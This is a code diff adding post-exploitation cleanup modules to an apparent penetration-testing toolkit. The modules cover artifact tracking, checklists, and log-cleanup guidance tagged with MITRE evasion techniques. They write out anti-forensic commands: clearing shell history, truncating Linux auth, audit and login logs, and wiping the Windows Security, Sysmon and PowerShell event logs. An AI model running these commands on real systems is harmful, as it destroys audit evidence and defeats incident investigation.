+        verify: "if not exist <path> echo CLEAN",
+      },
+    },
+    registry: {
+      linux: { cleanup: "", verify: "" },
+      windows: {
+        cleanup: 'reg delete "<path>" /f',
+        verify: 'reg query "<path>" 2>&1 | findstr /i "error"',
+      },
+    },
+    service: {
+      linux: {
+        cleanup: "systemctl stop <name> && systemctl disable <name> && rm /etc/systemd/system/<name>.service",
+        verify: "systemctl status <name> 2>&1 | grep -q 'not-found'",
+      },
+      windows: {
+        cleanup: 'sc stop <name> && sc delete <name>',
+        verify: 'sc query <name> 2>&1 | findstr /i "does not exist"',
+      },
+    },
+    scheduled_task: {
+      linux: {
+        cleanup: "crontab -l | grep -v '<pattern>' | crontab -",
+        verify: "crontab -l | grep -q '<pattern>' || echo CLEAN",
+      },
+      windows: {
+        cleanup: 'schtasks /delete /tn "<name>" /f',
+        verify: 'schtasks /query /tn "<name>" 2>&1 | findstr /i "does not exist"',
+      },
+    },
+    user_account: {
+      linux: {
+        cleanup: "userdel -r <username>",
+        verify: "id <username> 2>&1 | grep -q 'no such user'",
+      },
+      windows: {
+        cleanup: "net user <username> /delete",
+        verify: 'net user <username> 2>&1 | findstr /i "not find"',
+      },
+    },
+    log_entry: {
+      linux: {
+        cleanup: "# Log entries cannot be cleanly removed - see log cleanup guidance",
+        verify: "",
+      },
+      windows: {
+        cleanup: "# Log entries cannot be cleanly removed - see log cleanup guidance",
+        verify: "",
+      },
+    },
+    process: {
+      linux: {
+        cleanup: "kill -9 <pid>",
+        verify: "ps -p <pid> 2>&1 | grep -q 'no process'",
+      },
+      windows: {
+        cleanup: "taskkill /PID <pid> /F",
+        verify: "tasklist /fi \"PID eq <pid>\" 2>&1 | findstr /i \"no tasks\"",
+      },
+    },
+    network_connection: {
+      linux: {
+        cleanup: "# Connections close when process terminates",
+        verify: "netstat -an | grep -q '<pattern>' || echo CLEAN",
+      },
+      windows: {
+        cleanup: "# Connections close when process terminates",
+        verify: "netstat -an | findstr /i \"<pattern>\" || echo CLEAN",
+      },
+    },
+    firewall_rule: {
+      linux: {
+        cleanup: "iptables -D <rule>",
+        verify: "iptables -L | grep -q '<pattern>' || echo CLEAN",
+      },
+      windows: {
+        cleanup: 'netsh advfirewall firewall delete rule name="<name>"',
+        verify: 'netsh advfirewall firewall show rule name="<name>" 2>&1 | findstr /i "no rules"',
+      },
+    },
+    event_log: {
+      linux: {
+        cleanup: "# See log cleanup guidance",
+        verify: "",
+      },
+      windows: {
+        cleanup: "wevtutil cl <logname>",
+        verify: 'wevtutil gli <logname> | findstr "numberOfLogRecords: 0"',
+      },
+    },
+    prefetch: {
+      linux: { cleanup: "", verify: "" },
+      windows: {
+        cleanup: "del /f /q C:\\Windows\\Prefetch\\<pattern>*.pf",
+        verify: "dir C:\\Windows\\Prefetch\\<pattern>*.pf 2>&1 | findstr /i \"not found\"",
+      },
+    },
+    shimcache: {
+      linux: { cleanup: "", verify: "" },
+      windows: {
+        cleanup: "# ShimCache requires registry manipulation or reboot to clear",
+        verify: "",
+      },
+    },
+    amcache: {
+      linux: { cleanup: "", verify: "" },
+      windows: {
+        cleanup: "# AmCache requires specific registry manipulation",
+        verify: "",
+      },
+    },
+    mft_entry: {
+      linux: { cleanup: "", verify: "" },
+      windows: {
+        cleanup: "# MFT entries persist - requires secure deletion tools",
+        verify: "",
+      },
+    },
+  }
+
+  /**
+   * Create an artifact entry.
+   */
+  export function createArtifact(
+    type: PostExploitTypes.ArtifactType,
+    platform: PostExploitTypes.Platform,
+    path: string,
+    createdBy: string,
+    options?: {
+      description?: string
+      notes?: string
+    }
+  ): Omit<PostExploitTypes.Artifact, "id" | "createdAt"> {
+    const template = CLEANUP_TEMPLATES[type][platform]
+
+    return {
+      type,
+      platform,
+      path,
+      description: options?.description || `${type} artifact at ${path}`,
+      createdBy,
+      cleanupCommand: template.cleanup.replace(/<path>|<name>|<pattern>/g, path),
+      cleanupVerification: template.verify.replace(/<path>|<name>|<pattern>/g, path),
+      cleaned: false,
+      notes: options?.notes,
+    }
+  }
+
+  /**
+   * Get cleanup commands for an artifact.
+   */
+  export function getCleanupCommands(
+    artifact: PostExploitTypes.Artifact
+  ): { cleanup: string; verify: string } {
+    const template = CLEANUP_TEMPLATES[artifact.type][artifact.platform]
+    return {
+      cleanup: template.cleanup.replace(/<path>|<name>|<pattern>|<pid>|<username>/g, artifact.path),
+      verify: template.verify.replace(/<path>|<name>|<pattern>|<pid>|<username>/g, artifact.path),
+    }
+  }
+
+  /**
+   * Format artifacts for display.
+   */
+  export function formatArtifacts(artifacts: PostExploitTypes.Artifact[]): string {
+    if (artifacts.length === 0) {
+      return "No artifacts tracked."
+    }
+
+    const lines: string[] = []
+    const cleaned = artifacts.filter(a => a.cleaned)
+    const pending = artifacts.filter(a => !a.cleaned)
+
+    lines.push(`Tracked ${artifacts.length} artifact(s): ${cleaned.length} cleaned, ${pending.length} pending`)
+    lines.push("")
+
+    if (pending.length > 0) {
+      lines.push("[PENDING CLEANUP]")
+      for (const artifact of pending) {
+        lines.push(`  [!] ${artifact.type}: ${artifact.path}`)
+        lines.push(`      Created by: ${artifact.createdBy}`)
+        if (artifact.cleanupCommand) {
+          lines.push(`      Cleanup: ${artifact.cleanupCommand}`)
+        }
+      }
+      lines.push("")
+    }
+
+    if (cleaned.length > 0) {
+      lines.push("[CLEANED]")
+      for (const artifact of cleaned) {
+        lines.push(`  [+] ${artifact.type}: ${artifact.path}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Get artifact cleanup priority.
+   */
+  export function getCleanupPriority(type: PostExploitTypes.ArtifactType): "critical" | "high" | "medium" | "low" {
+    const priorities: Record<PostExploitTypes.ArtifactType, "critical" | "high" | "medium" | "low"> = {
+      file: "high",
+      registry: "high",
+      service: "critical",
+      scheduled_task: "critical",
+      user_account: "critical",
+      log_entry: "medium",
+      process: "high",
+      network_connection: "medium",
+      firewall_rule: "high",
+      event_log: "medium",
+      prefetch: "low",
+      shimcache: "low",
+      amcache: "low",
+      mft_entry: "low",
+    }
+    return priorities[type]
+  }
+
+  /**
+   * Get artifacts sorted by cleanup priority.
+   */
+  export function sortByPriority(artifacts: PostExploitTypes.Artifact[]): PostExploitTypes.Artifact[] {
+    const priorityOrder = { critical: 0, high: 1, medium: 2, low: 3 }
+    return [...artifacts].sort((a, b) =>
+      priorityOrder[getCleanupPriority(a.type)] - priorityOrder[getCleanupPriority(b.type)]
+    )
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/cleanup/checklist.ts b/packages/opencode/src/pentest/postexploit/cleanup/checklist.ts
new file mode 100644
index 00000000000..9ca19975db5
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/cleanup/checklist.ts
@@ -0,0 +1,316 @@
+/**
+ * @fileoverview Cleanup Verification Checklist
+ *
+ * Provides a comprehensive cleanup checklist for post-exploitation
+ * to ensure all artifacts and traces are properly addressed.
+ *
+ * @module pentest/postexploit/cleanup/checklist
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Cleanup checklist namespace.
+ */
+export namespace CleanupChecklist {
+  /**
+   * Generate a cleanup checklist for a session.
+   */
+  export function generateChecklist(
+    platform: PostExploitTypes.Platform,
+    artifacts: PostExploitTypes.Artifact[],
+    options?: {
+      includeLogCleanup?: boolean
+      includeForensicArtifacts?: boolean
+    }
+  ): PostExploitTypes.CleanupChecklistItem[] {
+    const items: PostExploitTypes.CleanupChecklistItem[] = []
+    let id = 0
+
+    // File artifacts
+    const fileArtifacts = artifacts.filter(a => a.type === "file")
+    if (fileArtifacts.length > 0) {
+      items.push({
+        id: `cleanup_${++id}`,
+        category: "Files",
+        description: `Remove ${fileArtifacts.length} created file(s)`,
+        commands: fileArtifacts.map(a => platform === "linux" ? `rm -f ${a.path}` : `del /f /q ${a.path}`),
+        verification: fileArtifacts.map(a => platform === "linux" ? `ls ${a.path}` : `dir ${a.path}`).join(" && "),
+        completed: false,
+        priority: "high",
+      })
+    }
+
+    // Service artifacts
+    const serviceArtifacts = artifacts.filter(a => a.type === "service")
+    if (serviceArtifacts.length > 0) {
+      items.push({
+        id: `cleanup_${++id}`,
+        category: "Services",
+        description: `Remove ${serviceArtifacts.length} created service(s)`,
+        commands: serviceArtifacts.map(a =>
+          platform === "linux"
+            ? `systemctl stop ${a.path} && systemctl disable ${a.path}`
+            : `sc stop ${a.path} && sc delete ${a.path}`
+        ),
+        verification: serviceArtifacts.map(a =>
+          platform === "linux"
+            ? `systemctl status ${a.path}`
+            : `sc query ${a.path}`
+        ).join(" && "),
+        completed: false,
+        priority: "critical",
+      })
+    }
+
+    // Scheduled task artifacts
+    const taskArtifacts = artifacts.filter(a => a.type === "scheduled_task")
+    if (taskArtifacts.length > 0) {
+      items.push({
+        id: `cleanup_${++id}`,
+        category: "Scheduled Tasks",
+        description: `Remove ${taskArtifacts.length} scheduled task(s)`,
+        commands: taskArtifacts.map(a =>
+          platform === "linux"
+            ? `crontab -l | grep -v "${a.path}" | crontab -`
+            : `schtasks /delete /tn "${a.path}" /f`
+        ),
+        completed: false,
+        priority: "critical",
+      })
+    }
+
+    // Registry artifacts (Windows only)
+    const registryArtifacts = artifacts.filter(a => a.type === "registry")
+    if (registryArtifacts.length > 0 && platform === "windows") {
+      items.push({
+        id: `cleanup_${++id}`,
+        category: "Registry",
+        description: `Remove ${registryArtifacts.length} registry modification(s)`,
+        commands: registryArtifacts.map(a => `reg delete "${a.path}" /f`),
+        completed: false,
+        priority: "high",
+      })
+    }
+
+    // User account artifacts
+    const userArtifacts = artifacts.filter(a => a.type === "user_account")
+    if (userArtifacts.length > 0) {
+      items.push({
+        id: `cleanup_${++id}`,
+        category: "User Accounts",
+        description: `Remove ${userArtifacts.length} created user account(s)`,
+        commands: userArtifacts.map(a =>
+          platform === "linux"
+            ? `userdel -r ${a.path}`
+            : `net user ${a.path} /delete`
+        ),
+        completed: false,
+        priority: "critical",
+      })
+    }
+
+    // Process cleanup
+    const processArtifacts = artifacts.filter(a => a.type === "process")
+    if (processArtifacts.length > 0) {
+      items.push({
+        id: `cleanup_${++id}`,
+        category: "Processes",
+        description: `Terminate ${processArtifacts.length} running process(es)`,
+        commands: processArtifacts.map(a =>
+          platform === "linux"
+            ? `kill -9 ${a.path}`
+            : `taskkill /PID ${a.path} /F`
+        ),
+        completed: false,
+        priority: "high",
+      })
+    }
+
+    // Firewall rules
+    const firewallArtifacts = artifacts.filter(a => a.type === "firewall_rule")
+    if (firewallArtifacts.length > 0) {
+      items.push({
+        id: `cleanup_${++id}`,
+        category: "Firewall Rules",
+        description: `Remove ${firewallArtifacts.length} firewall rule(s)`,
+        commands: firewallArtifacts.map(a =>
+          platform === "linux"
+            ? `iptables -D ${a.path}`
+            : `netsh advfirewall firewall delete rule name="${a.path}"`
+        ),
+        completed: false,
+        priority: "high",
+      })
+    }
+
+    // Command history
+    items.push({
+      id: `cleanup_${++id}`,
+      category: "Command History",
+      description: "Clear command history",
+      commands: platform === "linux"
+        ? [
+            "history -c",
+            "cat /dev/null > ~/.bash_history",
+            "unset HISTFILE",
+          ]
+        : [
+            "Clear-History",
+            "Remove-Item (Get-PSReadlineOption).HistorySavePath",
+          ],
+      completed: false,
+      priority: "medium",
+    })
+
+    // Log cleanup (optional)
+    if (options?.includeLogCleanup) {
+      items.push({
+        id: `cleanup_${++id}`,
+        category: "Logs",
+        description: "Address log entries (WARNING: may be more suspicious than leaving them)",
+        commands: platform === "linux"
+          ? [
+              "# Review /var/log/auth.log",
+              "# Review /var/log/syslog",
+              "# Review ~/.bash_history",
+            ]
+          : [
+              "# Review Security Event Log (Event ID 4624, 4625)",
+              "# Review PowerShell logs",
+              "# Consider if cleanup is appropriate",
+            ],
+        completed: false,
+        priority: "medium",
+        notes: "Log cleanup often creates more evidence than it removes",
+      })
+    }
+
+    // Forensic artifacts (optional)
+    if (options?.includeForensicArtifacts && platform === "windows") {
+      items.push({
+        id: `cleanup_${++id}`,
+        category: "Forensic Artifacts",
+        description: "Address Windows forensic artifacts",
+        commands: [
+          "# Prefetch files",
+          'del /f /q C:\\Windows\\Prefetch\\<TOOL>*.pf',
+          "",
+          "# Note: ShimCache and AmCache are difficult to modify",
+          "# Note: MFT entries persist even after file deletion",
+        ],
+        completed: false,
+        priority: "low",
+        notes: "May require specialized tools or be impossible to fully clean",
+      })
+    }
+
+    // Final verification
+    items.push({
+      id: `cleanup_${++id}`,
+      category: "Verification",
+      description: "Verify all artifacts removed",
+      commands: platform === "linux"
+        ? [
+            "# Verify no persistence remains",
+            "crontab -l",
+            "systemctl list-units --type=service",
+            "ls -la /tmp /var/tmp",
+          ]
+        : [
+            "# Verify no persistence remains",
+            "schtasks /query /fo LIST",
+            "sc query type= service state= all | findstr <SERVICE>",
+            "reg query HKCU\\...\\Run",
+          ],
+      completed: false,
+      priority: "high",
+    })
+
+    return items
+  }
+
+  /**
+   * Format checklist for display.
+   */
+  export function formatChecklist(items: PostExploitTypes.CleanupChecklistItem[]): string {
+    if (items.length === 0) {
+      return "No cleanup items."
+    }
+
+    const lines: string[] = []
+    const completed = items.filter(i => i.completed)
+    const pending = items.filter(i => !i.completed)
+
+    lines.push("CLEANUP CHECKLIST")
+    lines.push("=================")
+    lines.push(`Progress: ${completed.length}/${items.length} completed`)
+    lines.push("")
+
+    // Group by priority
+    const byPriority = {
+      critical: pending.filter(i => i.priority === "critical"),
+      high: pending.filter(i => i.priority === "high"),
+      medium: pending.filter(i => i.priority === "medium"),
+      low: pending.filter(i => i.priority === "low"),
+    }
+
+    for (const [priority, group] of Object.entries(byPriority)) {
+      if (group.length === 0) continue
+
+      lines.push(`[${priority.toUpperCase()}]`)
+      for (const item of group) {
+        lines.push(`  [ ] ${item.category}: ${item.description}`)
+        if (item.notes) {
+          lines.push(`      Note: ${item.notes}`)
+        }
+      }
+      lines.push("")
+    }
+
+    if (completed.length > 0) {
+      lines.push("[COMPLETED]")
+      for (const item of completed) {
+        lines.push(`  [x] ${item.category}: ${item.description}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Get checklist item commands.
+   */
+  export function getItemCommands(item: PostExploitTypes.CleanupChecklistItem): string {
+    const lines: string[] = []
+    lines.push(`# ${item.category}: ${item.description}`)
+    lines.push("")
+    for (const cmd of item.commands) {
+      lines.push(cmd)
+    }
+    if (item.verification) {
+      lines.push("")
+      lines.push("# Verification:")
+      lines.push(item.verification)
+    }
+    return lines.join("\n")
+  }
+
+  /**
+   * Get summary statistics for a checklist.
+   */
+  export function getSummary(items: PostExploitTypes.CleanupChecklistItem[]): {
+    total: number
+    completed: number
+    critical: number
+    criticalCompleted: number
+  } {
+    const critical = items.filter(i => i.priority === "critical")
+    return {
+      total: items.length,
+      completed: items.filter(i => i.completed).length,
+      critical: critical.length,
+      criticalCompleted: critical.filter(i => i.completed).length,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/cleanup/index.ts b/packages/opencode/src/pentest/postexploit/cleanup/index.ts
new file mode 100644
index 00000000000..49df3a9ee65
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/cleanup/index.ts
@@ -0,0 +1,157 @@
+/**
+ * @fileoverview Cleanup Module
+ *
+ * Exports for artifact tracking, log cleanup guidance, and cleanup checklists.
+ *
+ * @module pentest/postexploit/cleanup
+ */
+
+export { ArtifactTracking } from "./artifacts"
+export { LogCleanup } from "./logs"
+export { CleanupChecklist } from "./checklist"
+
+import { ArtifactTracking } from "./artifacts"
+import { LogCleanup } from "./logs"
+import { CleanupChecklist } from "./checklist"
+import { PostExploitTypes } from "../types"
+
+/**
+ * Unified cleanup interface.
+ */
+export namespace Cleanup {
+  /**
+   * Create an artifact entry.
+   */
+  export function createArtifact(
+    type: PostExploitTypes.ArtifactType,
+    platform: PostExploitTypes.Platform,
+    path: string,
+    createdBy: string,
+    options?: {
+      description?: string
+      notes?: string
+    }
+  ): Omit<PostExploitTypes.Artifact, "id" | "createdAt"> {
+    return ArtifactTracking.createArtifact(type, platform, path, createdBy, options)
+  }
+
+  /**
+   * Get cleanup commands for an artifact.
+   */
+  export function getArtifactCleanup(artifact: PostExploitTypes.Artifact): { cleanup: string; verify: string } {
+    return ArtifactTracking.getCleanupCommands(artifact)
+  }
+
+  /**
+   * Get log cleanup guidance for a platform.
+   */
+  export function getLogGuidance(platform: PostExploitTypes.Platform): PostExploitTypes.LogCleanupGuidance[] {
+    return LogCleanup.getGuidance(platform)
+  }
+
+  /**
+   * Generate a cleanup checklist.
+   */
+  export function generateChecklist(
+    platform: PostExploitTypes.Platform,
+    artifacts: PostExploitTypes.Artifact[],
+    options?: {
+      includeLogCleanup?: boolean
+      includeForensicArtifacts?: boolean
+    }
+  ): PostExploitTypes.CleanupChecklistItem[] {
+    return CleanupChecklist.generateChecklist(platform, artifacts, options)
+  }
+
+  /**
+   * Format artifacts for display.
+   */
+  export function formatArtifacts(artifacts: PostExploitTypes.Artifact[]): string {
+    return ArtifactTracking.formatArtifacts(artifacts)
+  }
+
+  /**
+   * Format checklist for display.
+   */
+  export function formatChecklist(items: PostExploitTypes.CleanupChecklistItem[]): string {
+    return CleanupChecklist.formatChecklist(items)
+  }
+
+  /**
+   * Format log guidance for display.
+   */
+  export function formatLogGuidance(platform: PostExploitTypes.Platform): string {
+    return LogCleanup.formatGuidance(platform)
+  }
+
+  /**
+   * Get artifacts sorted by cleanup priority.
+   */
+  export function sortArtifactsByPriority(artifacts: PostExploitTypes.Artifact[]): PostExploitTypes.Artifact[] {
+    return ArtifactTracking.sortByPriority(artifacts)
+  }
+
+  /**
+   * Get high-risk logs that need attention.
+   */
+  export function getHighRiskLogs(platform: PostExploitTypes.Platform): PostExploitTypes.LogCleanupGuidance[] {
+    return LogCleanup.getHighRiskLogs(platform)
+  }
+
+  /**
+   * Get checklist summary.
+   */
+  export function getChecklistSummary(items: PostExploitTypes.CleanupChecklistItem[]) {
+    return CleanupChecklist.getSummary(items)
+  }
+
+  /**
+   * Get quick reference for cleanup.
+   */
+  export function getQuickReference(platform: PostExploitTypes.Platform): string {
+    const lines: string[] = []
+    lines.push(`${platform.toUpperCase()} CLEANUP QUICK REFERENCE`)
+    lines.push("=".repeat(40))
+    lines.push("")
+    lines.push("Priority Order:")
+    lines.push("  1. Running processes (terminate)")
+    lines.push("  2. Persistence mechanisms (services, tasks, registry)")
+    lines.push("  3. Created files")
+    lines.push("  4. User accounts")
+    lines.push("  5. Network artifacts (firewall rules)")
+    lines.push("  6. Command history")
+    lines.push("  7. Logs (optional, often counterproductive)")
+    lines.push("")
+
+    if (platform === "linux") {
+      lines.push("Quick Commands:")
+      lines.push("  # Clear history")
+      lines.push("  history -c && cat /dev/null > ~/.bash_history")
+      lines.push("")
+      lines.push("  # Remove cron job")
+      lines.push("  crontab -l | grep -v 'pattern' | crontab -")
+      lines.push("")
+      lines.push("  # Remove systemd service")
+      lines.push("  systemctl stop svc && systemctl disable svc && rm /etc/systemd/system/svc.service")
+    } else {
+      lines.push("Quick Commands:")
+      lines.push("  # Clear PowerShell history")
+      lines.push("  Clear-History; Remove-Item (Get-PSReadlineOption).HistorySavePath")
+      lines.push("")
+      lines.push("  # Remove scheduled task")
+      lines.push('  schtasks /delete /tn "TaskName" /f')
+      lines.push("")
+      lines.push("  # Remove service")
+      lines.push("  sc stop svc && sc delete svc")
+      lines.push("")
+      lines.push("  # Remove Run key")
+      lines.push('  reg delete "HKCU\\...\\Run" /v "ValueName" /f')
+    }
+
+    lines.push("")
+    lines.push("WARNING: Log cleanup often creates more evidence than it removes.")
+    lines.push("Consider engagement scope before modifying logs.")
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/cleanup/logs.ts b/packages/opencode/src/pentest/postexploit/cleanup/logs.ts
new file mode 100644
index 00000000000..8866f95aad3
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/cleanup/logs.ts
@@ -0,0 +1,291 @@
+/**
+ * @fileoverview Log Cleanup Guidance
+ *
+ * Provides guidance for log cleanup and understanding forensic
+ * implications of various log sources.
+ *
+ * @module pentest/postexploit/cleanup/logs
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Log cleanup guidance namespace.
+ */
+export namespace LogCleanup {
+  /**
+   * Linux log locations and cleanup guidance.
+   */
+  export const LINUX_LOGS: PostExploitTypes.LogCleanupGuidance[] = [
+    {
+      logType: "auth.log / secure",
+      platform: "linux",
+      location: "/var/log/auth.log or /var/log/secure",
+      description: "Authentication events including SSH logins, sudo usage",
+      cleanupCommands: [
+        "# WARNING: Modifying auth logs is highly detectable",
+        "# Option 1: Remove specific entries (leaves gaps)",
+        "sed -i '/<pattern>/d' /var/log/auth.log",
+        "",
+        "# Option 2: Truncate (obvious)",
+        "cat /dev/null > /var/log/auth.log",
+        "",
+        "# Option 3: Disable logging temporarily",
+        "# Not recommended - creates suspicious gaps",
+      ],
+      risk: "high",
+      forensicImpact: "High - Authentication logs are primary forensic evidence for intrusion",
+      mitre: [PostExploitTypes.MITRE_EVASION.CLEAR_LINUX_LOGS],
+    },
+    {
+      logType: "bash_history",
+      platform: "linux",
+      location: "~/.bash_history",
+      description: "User command history",
+      cleanupCommands: [
+        "# Disable history for current session",
+        "unset HISTFILE",
+        "export HISTSIZE=0",
+        "",
+        "# Clear history file",
+        "cat /dev/null > ~/.bash_history",
+        "history -c",
+        "",
+        "# Prevent history from being saved",
+        "ln -sf /dev/null ~/.bash_history",
+      ],
+      risk: "low",
+      forensicImpact: "Medium - Shows attacker commands but often cleared legitimately",
+      mitre: [PostExploitTypes.MITRE_EVASION.CLEAR_LINUX_LOGS],
+    },
+    {
+      logType: "syslog / messages",
+      platform: "linux",
+      location: "/var/log/syslog or /var/log/messages",
+      description: "General system messages",
+      cleanupCommands: [
+        "# Remove specific entries",
+        "sed -i '/<pattern>/d' /var/log/syslog",
+        "",
+        "# Be aware of log rotation",
+        "ls /var/log/syslog*",
+      ],
+      risk: "medium",
+      forensicImpact: "Medium - Contains various system events",
+      mitre: [PostExploitTypes.MITRE_EVASION.CLEAR_LINUX_LOGS],
+    },
+    {
+      logType: "wtmp / btmp",
+      platform: "linux",
+      location: "/var/log/wtmp, /var/log/btmp",
+      description: "Login records (successful and failed)",
+      cleanupCommands: [
+        "# View records",
+        "last -f /var/log/wtmp",
+        "lastb -f /var/log/btmp",
+        "",
+        "# Clear (binary files - requires special handling)",
+        "cat /dev/null > /var/log/wtmp",
+        "cat /dev/null > /var/log/btmp",
+        "",
+        "# Or use utmpdump to edit specific entries",
+        "utmpdump /var/log/wtmp > /tmp/wtmp.txt",
+        "# Edit /tmp/wtmp.txt",
+        "utmpdump -r < /tmp/wtmp.txt > /var/log/wtmp",
+      ],
+      risk: "medium",
+      forensicImpact: "High - Direct evidence of logins",
+      mitre: [PostExploitTypes.MITRE_EVASION.CLEAR_LINUX_LOGS],
+    },
+    {
+      logType: "lastlog",
+      platform: "linux",
+      location: "/var/log/lastlog",
+      description: "Last login times for all users",
+      cleanupCommands: [
+        "# View lastlog",
+        "lastlog",
+        "",
+        "# Clear (binary file)",
+        "# Requires specific editing or truncation",
+        "cat /dev/null > /var/log/lastlog",
+      ],
+      risk: "low",
+      forensicImpact: "Low - Only shows last login",
+      mitre: [PostExploitTypes.MITRE_EVASION.CLEAR_LINUX_LOGS],
+    },
+    {
+      logType: "audit logs",
+      platform: "linux",
+      location: "/var/log/audit/audit.log",
+      description: "Linux audit daemon logs",
+      cleanupCommands: [
+        "# Check if auditd is running",
+        "systemctl status auditd",
+        "",
+        "# View audit logs",
+        "ausearch -m all",
+        "",
+        "# Clear audit logs (requires root, highly suspicious)",
+        "service auditd rotate",
+        "rm /var/log/audit/audit.log.*",
+      ],
+      risk: "high",
+      forensicImpact: "Critical - Detailed system call auditing",
+      mitre: [PostExploitTypes.MITRE_EVASION.CLEAR_LINUX_LOGS],
+    },
+  ]
+
+  /**
+   * Windows log locations and cleanup guidance.
+   */
+  export const WINDOWS_LOGS: PostExploitTypes.LogCleanupGuidance[] = [
+    {
+      logType: "Security Event Log",
+      platform: "windows",
+      location: "C:\\Windows\\System32\\winevt\\Logs\\Security.evtx",
+      description: "Security events including logons, privilege use, audit policy changes",
+      cleanupCommands: [
+        "# Clear Security log (requires admin, creates Event ID 1102)",
+        "wevtutil cl Security",
+        "",
+        "# PowerShell",
+        "Clear-EventLog -LogName Security",
+        "",
+        "# WARNING: Clearing creates a clear event (1102) which is itself evidence",
+      ],
+      risk: "high",
+      forensicImpact: "Critical - Primary source for security investigations",
+      mitre: [PostExploitTypes.MITRE_EVASION.CLEAR_WINDOWS_LOGS],
+    },
+    {
+      logType: "System Event Log",
+      platform: "windows",
+      location: "C:\\Windows\\System32\\winevt\\Logs\\System.evtx",
+      description: "System events including service changes, driver loads",
+      cleanupCommands: [
+        "wevtutil cl System",
+        "",
+        "# PowerShell",
+        "Clear-EventLog -LogName System",
+      ],
+      risk: "medium",
+      forensicImpact: "High - Service and driver changes are logged here",
+      mitre: [PostExploitTypes.MITRE_EVASION.CLEAR_WINDOWS_LOGS],
+    },
+    {
+      logType: "Application Event Log",
+      platform: "windows",
+      location: "C:\\Windows\\System32\\winevt\\Logs\\Application.evtx",
+      description: "Application events",
+      cleanupCommands: [
+        "wevtutil cl Application",
+      ],
+      risk: "low",
+      forensicImpact: "Medium - Application-specific events",
+      mitre: [PostExploitTypes.MITRE_EVASION.CLEAR_WINDOWS_LOGS],
+    },
+    {
+      logType: "PowerShell Logs",
+      platform: "windows",
+      location: "C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-PowerShell%4Operational.evtx",
+      description: "PowerShell script execution and commands",
+      cleanupCommands: [
+        "wevtutil cl Microsoft-Windows-PowerShell/Operational",
+        "",
+        "# Also clear PowerShell transcript logs if enabled",
+        "del C:\\PowerShellTranscripts\\*",
+      ],
+      risk: "high",
+      forensicImpact: "Critical - Full PowerShell command logging",
+      mitre: [PostExploitTypes.MITRE_EVASION.CLEAR_WINDOWS_LOGS],
+    },
+    {
+      logType: "Sysmon Logs",
+      platform: "windows",
+      location: "C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-Sysmon%4Operational.evtx",
+      description: "Detailed process, network, and file system monitoring",
+      cleanupCommands: [
+        "# Check if Sysmon is installed",
+        "sc query Sysmon",
+        "",
+        "# Clear Sysmon logs",
+        "wevtutil cl Microsoft-Windows-Sysmon/Operational",
+        "",
+        "# WARNING: Sysmon provides detailed monitoring - presence indicates mature security",
+      ],
+      risk: "high",
+      forensicImpact: "Critical - Detailed system monitoring if present",
+      mitre: [PostExploitTypes.MITRE_EVASION.CLEAR_WINDOWS_LOGS],
+    },
+    {
+      logType: "Task Scheduler Log",
+      platform: "windows",
+      location: "C:\\Windows\\System32\\winevt\\Logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx",
+      description: "Scheduled task creation and execution",
+      cleanupCommands: [
+        "wevtutil cl Microsoft-Windows-TaskScheduler/Operational",
+      ],
+      risk: "medium",
+      forensicImpact: "High - Task creation is key persistence evidence",
+      mitre: [PostExploitTypes.MITRE_EVASION.CLEAR_WINDOWS_LOGS],
+    },
+    {
+      logType: "Prefetch",
+      platform: "windows",
+      location: "C:\\Windows\\Prefetch\\",
+      description: "Application execution artifacts",
+      cleanupCommands: [
+        "# Delete specific prefetch files",
+        "del /f /q C:\\Windows\\Prefetch\\<PAYLOAD>*.pf",
+        "",
+        "# Note: Prefetch helps identify executed programs",
+      ],
+      risk: "low",
+      forensicImpact: "Medium - Shows program execution history",
+      mitre: [PostExploitTypes.MITRE_EVASION.FILE_DELETION],
+    },
+  ]
+
+  /**
+   * Get log cleanup guidance for a platform.
+   */
+  export function getGuidance(platform: PostExploitTypes.Platform): PostExploitTypes.LogCleanupGuidance[] {
+    return platform === "linux" ? LINUX_LOGS : WINDOWS_LOGS
+  }
+
+  /**
+   * Get high-risk logs that should be addressed.
+   */
+  export function getHighRiskLogs(platform: PostExploitTypes.Platform): PostExploitTypes.LogCleanupGuidance[] {
+    const logs = getGuidance(platform)
+    return logs.filter(log => log.risk === "high")
+  }
+
+  /**
+   * Format log cleanup guidance for display.
+   */
+  export function formatGuidance(platform: PostExploitTypes.Platform): string {
+    const logs = getGuidance(platform)
+    const lines: string[] = []
+
+    lines.push(`${platform.toUpperCase()} LOG CLEANUP GUIDANCE`)
+    lines.push("=".repeat(40))
+    lines.push("")
+    lines.push("WARNING: Log modification is often more suspicious than the original activity.")
+    lines.push("Consider whether cleanup is appropriate for your engagement scope.")
+    lines.push("")
+
+    for (const log of logs) {
+      const riskIndicator = log.risk === "high" ? "[!]" : log.risk === "medium" ? "[*]" : "[-]"
+      lines.push(`${riskIndicator} ${log.logType}`)
+      lines.push(`    Location: ${log.location}`)
+      lines.push(`    Forensic Impact: ${log.forensicImpact}`)
+      lines.push("")
+    }
+
+    lines.push("Legend: [!] high risk, [*] medium risk, [-] low risk")
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/creds/discovery.ts b/packages/opencode/src/pentest/postexploit/creds/discovery.ts
new file mode 100644
index 00000000000..23dc451bc6e
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/creds/discovery.ts
@@ -0,0 +1,524 @@
+/**
+ * @fileoverview Credential Discovery
+ *
+ * Provides guidance for discovering potential credential storage locations
+ * and understanding common credential types and sources.
+ *
+ * @module pentest/postexploit/creds/discovery
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Credential discovery namespace.
+ */
+export namespace CredentialDiscovery {
+  /**
+   * Common credential locations by platform and source.
+   */
+  export const CREDENTIAL_LOCATIONS: Record<
+    PostExploitTypes.Platform,
+    Record<string, {
+      description: string
+      paths: string[]
